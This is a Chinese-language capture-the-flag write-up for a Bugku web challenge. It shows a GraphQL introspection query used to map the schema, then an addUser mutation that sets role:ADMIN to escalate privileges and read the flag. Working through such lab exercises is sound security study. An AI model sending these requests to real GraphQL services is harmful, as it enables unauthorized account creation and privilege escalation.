Bugku刷题-(HACKINI 2023)simple web app
<p>首先正常注册登录,没有发现别的信息,抓包看看发现有一个/graphql的请求</p>
{"query":"\n {\n user { \n username,\n email\n }\n }\n "}
这里直接重发包的话回显就是邮箱和用户名,所以我们需要改一下请求体
{"query":"\n query IntrospectionQuery {\n __schema {\n \n queryType { name }\n mutationType { name }\n subscriptionType { name }\n types {\n ...FullType\n }\n directives {\n name\n description\n \n locations\n args {\n ...InputValue\n }\n }\n }\n }\n\n fragment FullType on __Type {\n kind\n name\n description\n \n fields(includeDeprecated: true) {\n name\n description\n args {\n ...InputValue\n }\n type {\n ...TypeRef\n }\n isDeprecated\n deprecationReason\n }\n inputFields {\n ...InputValue\n }\n interfaces {\n ...TypeRef\n }\n enumValues(includeDeprecated: true) {\n name\n description\n isDeprecated\n deprecationReason\n }\n possibleTypes {\n ...TypeRef\n }\n }\n\n fragment InputValue on __InputValue {\n name\n description\n type { ...TypeRef }\n defaultValue\n \n \n }\n\n fragment TypeRef on __Type {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n ofType {\n kind\n name\n }\n }\n }\n }\n }\n }\n }\n }\n ","variables":{},"operationName":"IntrospectionQuery"}
这个请求体将查看所有接口,我们可以看见在User中的role里有一个ADMIN,猜测只有这个ADMIN用户才可以获取flag,但是直接注册或者变化大小写注册ADMIN都不可以,所以直接通过addusers操作来讲一个新用户的角色设置为ADMIN
在网上找到Mutation的addUsers功能去将当前用户名改为ADMIN用户
{"query":"mutation {\n addUser(username:\"aaa\",password:\"bbb\",email:\"ccc\",role:ADMIN)\n}"}
将这段代码替换原本的query请求,登陆后访问/profile就可以读取flag(这里注意不能注册ADMIN用户,不然就会报错该用户已经存在)
解释一下这里的参数,aaa是用户名,bbb是用户密码
这样添加了一个role为ADMIN的aaa用户之后,就可以直接退出登录aaa用户,获得flag
浙公网安备 33010602011771号